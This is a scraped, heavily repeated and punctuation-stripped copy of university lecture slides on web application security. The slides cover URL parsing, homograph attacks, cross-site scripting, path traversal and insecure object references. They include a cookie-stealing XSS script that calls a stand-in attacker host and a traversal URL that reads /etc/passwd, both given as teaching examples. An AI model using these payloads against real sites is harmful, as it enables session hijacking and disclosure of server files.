Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 11: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 12: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 13: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 14: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

